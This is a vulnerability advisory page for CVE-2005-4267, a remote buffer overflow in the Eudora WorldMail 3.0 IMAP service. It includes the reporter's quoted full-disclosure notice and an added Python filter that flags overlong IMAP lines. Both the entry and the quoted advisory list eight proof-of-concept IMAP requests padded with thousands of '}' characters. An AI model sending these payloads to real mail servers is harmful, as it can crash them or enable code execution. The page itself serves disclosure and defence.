SecurityTracker.com
Category:   Application (E-mail Server)  >   Eudora WorldMail Server
Vendors:   Qualcomm
Eudora WorldMail Server Buffer Overflow in Processing IMAP Commands Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1015391
SecurityTracker URL:  http://securitytracker.com/id/1015391
CVE Reference:   CVE-2005-4267
Updated:  Dec 21 2005
Original Entry Date:  Dec 20 2005
Impact:   Execution of arbitrary code via network, Root access via network

Version(s): 3.0 (IMAPd Service 6.1.19.0 and possibly others)
Description:   A vulnerability was reported in Eudora WorldMail Server. A remote user can execute arbitrary code on the target system.

A remote user can send a specially crafted IMAP command to trigger a buffer overflow and cause the target service to crash or execute arbitrary code.

Some demonstration exploit requests are provided:

IMAP REQUEST: '02 LIST ""' + '}'x 5000
IMAP REQUEST: '03 LSUB ""' + '}'x 32762
IMAP REQUEST: '04 SEARCH TEXT ' + '}'x32762
IMAP REQUEST: '05 STATUS INBOX ' + '}'x32764
IMAP REQUEST: '02 AUTHENTICATE ' + '}'x32768
IMAP REQUEST: '02 FETCH 2:4 ' + '}'x10000
IMAP REQUEST: '02 SELECT ' + '}'x10000
IMAP REQUEST: '02 COPY 2:4 ' + '}'x32765

The vulnerability was reported by Tim Shelton.

The vendor was notified on December 1, 2005.

iDEFENSE reported the same vulnerability, with the advisory available at:

http://www.idefense.com/intelligence/vulnerabilities/display.php?id=359

Impact:   A remote user can execute arbitrary code on the target system with System level privileges.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.eudora.com/worldmail/
Cause:   Boundary error
Underlying OS:  Windows (NT), Windows (2000), Windows (2003), Windows (XP)
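
With no vendor fix available at the time of this entry, one compensating control is to screen IMAP traffic in front of the server. The following Python code is an added example, not code from SecurityTracker, the advisory author or the vendor: it reassembles client command lines and flags the pattern seen in the demonstration requests (an overlong line or a long run of `}`). The limits `MAX_LINE` and `MAX_BRACE_RUN` and all function and class names are assumptions, and the traffic in the demo is constructed.

```python
import re

# Commands used in the advisory's demonstration requests.
ADVISORY_COMMANDS = {b"LIST", b"LSUB", b"SEARCH", b"STATUS",
                     b"AUTHENTICATE", b"FETCH", b"SELECT", b"COPY"}
MAX_LINE = 8192     # assumed policy: longest command line accepted
MAX_BRACE_RUN = 8   # assumed policy: longest tolerated run of '}'
BRACE_RUN = re.compile(rb"\}{%d,}" % (MAX_BRACE_RUN + 1))

def check_line(line):
    """Return the reasons one command line (without CRLF) is suspicious."""
    reasons = []
    if len(line) > MAX_LINE:
        reasons.append("overlong")
    if BRACE_RUN.search(line):
        reasons.append("brace-run")
    words = line[:64].split()           # tag, command, first arguments
    if reasons and len(words) > 1 and words[1].upper() in ADVISORY_COMMANDS:
        reasons.append("advisory-command:" + words[1].upper().decode())
    return reasons

class ImapScreen:
    """Reassembles client-to-server bytes into lines and checks each one."""
    def __init__(self):
        self.buf = b""
        self.skipping = False           # inside a line already reported

    def feed(self, chunk):
        """Consume one TCP payload; return a list of (reasons, prefix)."""
        alerts = []
        self.buf += chunk
        while b"\r\n" in self.buf:
            line, self.buf = self.buf.split(b"\r\n", 1)
            if self.skipping:           # tail of a line already reported
                self.skipping = False
                continue
            reasons = check_line(line)
            if reasons:
                alerts.append((reasons, line[:24]))
        if len(self.buf) > MAX_LINE:    # no CRLF yet: never buffer unbounded
            if not self.skipping:
                alerts.append((check_line(self.buf), self.buf[:24]))
            self.skipping = True
            self.buf = self.buf[-1:]    # keep a possible trailing CR
        return alerts

if __name__ == "__main__":
    screen = ImapScreen()               # constructed traffic, two payloads
    print(screen.feed(b'02 LIST "" "*"\r\n02 SELECT ' + b"}" * 6000))
    print(screen.feed(b"}" * 4000 + b"\r\n03 NOOP\r\n"))
```

Literal data that follows a `{n}` marker is scanned here as if it were command lines, so a deployment that must accept large literals needs to track literal lengths before applying the line limit.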

Message History:   None.


 Source Message Contents

Subject:  [Full-disclosure] [ACSSEC-2005-11-27-0x1] Eudora Qualcomm WorldMail

-=[+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++]=-
ACS Security Assessment Advisory - Buffer Overflow

ID:       ACSSEC-2005-11-27 - 0x1

Class:    Buffer Overflow
Package:  Eudora Qualcomm WorldMail 3.0 IMAP4 Service 6.1.19.0
Build:    Windows NT/2k/XP/2k3
Notified: Dec 01, 2005
Released: Dec 21, 2005

Remote:   Yes
Severity: Medium

Credit:   Tim Shelton <security-advisories@acs-inc.com>
-=[+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++]=-

-=[ Background

WorldMail 3 email and messaging server for small to large 
enterprises combines the features needed for today's cluttered 
email environment. WorldMail 3 combines the latest security 
tools required to stop abuse, spam, viruses and 
Directory Harvest Attacks (DHA). Other features include: a 
web-based email client, multi-level administration privileges 
and tools for migrating from WorldMail 2, OpenWave Post.Office, 
Ipswitch iMail and others.


-=[ Technical Description

Eudora Qualcomm WorldMail 3.0 IMAPd Service 6.1.19.0 (and possibly others)
is vulnerable to a buffer overflow via specially crafted IMAP requests. 
A remote attacker could issue the vulnerable command followed by malicious
code to execute arbitrary code or lead to a denial of service.


-=[ Proof of Concepts

IMAP REQUEST: '02 LIST ""' + '}'x 5000
IMAP REQUEST: '03 LSUB ""' + '}'x 32762
IMAP REQUEST: '04 SEARCH TEXT ' + '}'x32762
IMAP REQUEST: '05 STATUS INBOX ' + '}'x32764
IMAP REQUEST: '02 AUTHENTICATE ' + '}'x32768
IMAP REQUEST: '02 FETCH 2:4 ' + '}'x10000
IMAP REQUEST: '02 SELECT ' + '}'x10000
IMAP REQUEST: '02 COPY 2:4 ' + '}'x32765

-=[ Solution
No remedy available as of December 2005.

-=[ Credits

Vulnerability originally reported by Tim Shelton


-=[ Similar References

http://www.idefense.com/application/poi/display?id=341&type=vulnerabilities

-=[ ChangeLog

2005-11-27 : Original Advisory
2005-12-01 : Vendor Notified
2005-12-20 : No response from vendor, disclosing full information.
